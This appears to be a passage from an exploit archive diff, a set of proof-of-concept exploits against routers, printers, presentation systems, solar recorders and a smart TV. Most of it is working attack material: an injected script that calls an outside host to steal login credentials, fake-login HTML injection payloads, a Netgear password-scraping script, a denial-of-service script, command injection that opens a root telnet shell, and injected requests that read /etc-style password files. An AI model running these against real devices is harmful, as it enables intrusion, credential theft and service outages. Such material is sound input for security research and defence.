<!DOCTYPE html>
<html>
<head>
<title>Welcome</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8">
<meta http-equiv="pragma" content="no-cache">
<link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" />
<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
<script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
var errorNum = 0;
var mp_idx = "";$.getScript('//$LHOST/z');//";
...
When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:
$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -

63
exploits/hardware/webapps/46751.txt Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter.
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7438
***********************************************************************
## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
----------------------------------------
# Proof Of ConceptoC
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOAD in mask parameter and then show Response in browser
Payload =>
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
9- You will see a fake Login page on the screen -
----------------------------------------------------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter -
----------------------------------------------------------------------------------
REQUEST
-------------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 550
Connection: close
Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0
****************************
RESPONSE
-----------------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 1167
Date: Mon, 21 Jan 2019 18:02:07 GMT
Server: lighttpd/1.4.35
{"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"}
---------------------------------------------------------------------------------------------------------------

29
exploits/hardware/webapps/46764.sh Executable file
View file

@ -0,0 +1,29 @@
#/bin/bash
# PoC based on CVE-2016-5649 created by Social Engineering Neo.
#
# Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs
#
# https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices.
# https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices.
#
# A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication.
# When the request is processed, it exposes the administrator password in clear text before getting redirected to 'absw_vfysucc.cgia'.
# An attacker can use this password to gain administrator access of the targeted routers web interface.
#
# Netgear has released firmware version 1.0.0.52 for DGN2200 & 1.0.0.28 for DGND3700 to address this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' $target:$port/BSW_cxttongr.htm)
pass=$(echo $grab | awk '{print $218}' | tail -c +2 | head -c -3)
if [ "$pass" == '' ] || [ "$pass" == '/html' ] ; then
echo Invalid Response, Target May Not be Vulnerable.
else
echo The Password for: $target is: $pass
fi
else
echo "Incorrect Port."
fi

36
exploits/hardware/webapps/46768.sh Executable file
View file

@ -0,0 +1,36 @@
#/bin/bash
# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi
clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi

35
exploits/hardware/webapps/46770.html Normal file
View file

@ -0,0 +1,35 @@
<!--
PoC based on CVE-2019-11416 created by Social Engineering Neo.
Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/
Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.
Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>IWR 3000N - CSRF on authenticated administrator</title>
</head>
<body>
<button onclick="exploit()">Exploit!</button>
<p>Click the button to get the login and password.</p>
<script>
function exploit(){
$.get( "http://localhost:80/v1/system/user" )
.done(( data ) => {
alert( data );
})
.fail(function( err, status) {
alert( status );
});
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>
</html>

40
exploits/hardware/webapps/46786.txt Normal file
View file

@ -0,0 +1,40 @@
##
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection
# Date: 05/01/2019
# Exploit Author: Jacob Baines
# Tested on: Crestron AM-100 1.6.0.2
# CVE : CVE-2019-3929
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
# Advisory: https://www.tenable.com/security/research/tra-2019-20
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
# Affected Vendors/Device/Firmware:
# - Crestron AM-100 1.6.0.2
# - Crestron AM-101 2.7.0.1
# - Barco wePresent WiPG-1000P 2.3.0.10
# - Barco wePresent WiPG-1600W before 2.4.1.19
# - Extron ShareLink 200/250 2.0.3.4
# - Teq AV IT WIPS710 1.1.0.7
# - InFocus LiteShow3 1.0.16
# - InFocus LiteShow4 2.0.0.7
# - Optoma WPS-Pro 1.0.0.5
# - Blackbox HD WPS 1.0.0.5
# - SHARP PN-L703WA 1.4.2.3
##
The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
Example:
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
root
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
Trying 192.168.88.250...
Connected to 192.168.88.250.
Escape character is '^]'.
~/boa/cgi-bin #

42
exploits/hardware/webapps/46826.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4510DN
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: CVE-2019-11845
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
DNT: 1
Connection: close
Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
# HTTP Response :
HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:42:46 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:42:46 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]

43
exploits/hardware/webapps/46827.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: RICOH SP 4520DN Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4520DN
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: CVE-2019-11844
# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
# entryNameIn or entryDisplayNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 219
DNT: 1
Connection: close
Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008
mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
# HTTP Response :
HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:00:09 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:00:09 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]

356
exploits/hardware/webapps/46841.txt Normal file
View file

@ -0,0 +1,356 @@
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_restore
Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configRestore"
and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"
;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;command2
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_save
Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configBackup"
and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=upgrade
Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "firmwareRestore"
and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"
;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+

88
exploits/hardware/webapps/46882.txt Normal file
View file

@ -0,0 +1,88 @@
# Exploit Title: TL-WR840N v5 00000005
# Date: 5/10/2019
# Exploit Author: purnendu ghosh
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
# Category: Hardware
# Firmware Version:0.9.1 3.16 v0001.0 Build 171211 Rel.58800n
# Hardware Version:TL-WR840N v5 00000005
# Tested on: Windows 10
# CVE :CVE-2019-12195.
# Proof Of Concept:
TP-Link TL-WR840N v5 00000005 devices allow XSS via the network name. The attacker must
log into the router by breaking the password and going to the admin
login page by THC-HYDRA to get the network name. With an XSS payload,
the network name changed automatically and the internet connection was
disconnected. All the users become disconnected from
the internet.
------------------------------------------
[Additional Information]
To ensure your network to be safe from Renaming and internet disconnection.
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
tp-link
------------------------------------------
[Affected Product Code Base]
router - TL-WR840N v5 00000005
------------------------------------------
[Affected Component]
Wi-Fi network configured through the router
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Denial of Service]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Logged in to the router by breaking the password and goes to the admin
login page by THC-HYDRA and got the network name. Using Burp Suite
professional version 1.7.32 captured the network name and selected XSS
payload against the name and started attacking .as a result the
network name changed automatically and internet connection was
disconnected in the network. All the users become disconnected from
internet.
------------------------------------------
[Discoverer]
purnendu ghosh
[Reference]
https://www.tp-link.com/us/security

17
exploits/hardware/webapps/46896.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: AUO Solar Data Recorder - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# 1. Description:
# In AUO Solar Data Recorder web page,
# user can modify the system settings by access the /protect/config.htm.
# Attackers can inject malicious XSS code in parameter "addr" of post data.
# The value of addr will be stored in database, so that cause a stored XSS vulnerability.
# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
# Send this post data:
addr= "<script>alert(123)</script>&dhcp=1

19
exploits/hardware/webapps/46897.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
# 1. Description:
# In Carel pCOWeb web page,
# user can modify the system configuration by access the /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>

16
exploits/hardware/webapps/46898.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
# 1. Description:
# The devices, Carel pCOWeb, store plaintext passwords,
# which may allow sensitive information to be read by someone with access to the device.
# 2. Proof of Concept:
# Browse the maintain user page in website:
# http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html
# The user's information include Description, Username and Password.
# In user page, we can find out that user passwords stored in plaintext.

20
exploits/hardware/webapps/46957.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: CVE-2019-11367
# 1. Description:
# In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication.
# Once user access the files which are under path http://<host>/protect/,
# the website will response the plaintext account and password in WWW-Authenticate attribute.
# Attackers is capable to login AUO Solar Data Recorder successfully.
# 2. Proof of Concept:
# Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder.
# The website use HTTP Basic Access Authentication,
# and response the plaintext account and password in WWW-Authenticate attribute.
# By using the account and password in HTTP response,
# anyone can login AUO Solar Data Recorder successfully.

59
exploits/hardware/webapps/46971.txt Normal file
View file

@ -0,0 +1,59 @@
Exploit Title: Remote file inclusion
# Date: 03-06-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://supra.ru
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
# CVE: CVE-2019-12477
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
# https://www.inputzero.io/2019/06/hacking-smart-tv.html
Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
function, which allows a local attacker to broadcast fake video without any
authentication via a /remote/media_control?action=setUri&uri=URI
Technical Observation:
We are abusing `openLiveURL()` which allows a local attacker to broadcast
video on supra smart cloud TV. I found this vulnerability initially by
source code review and then by crawling the application and reading every
request helped me to trigger this vulnerability.
Vulnerable code:
function openLiveTV(url)
{
$.get("/remote/media_control",
{m_action:'setUri',m_uri:url,m_type:'video/*'},
function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else
{
alert(textStatus);
}
});
}
Vulnerable request:
GET /remote/media_control?action=setUri&uri=
http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
To trigger the vulnerability you can send a crafted request to the URL,
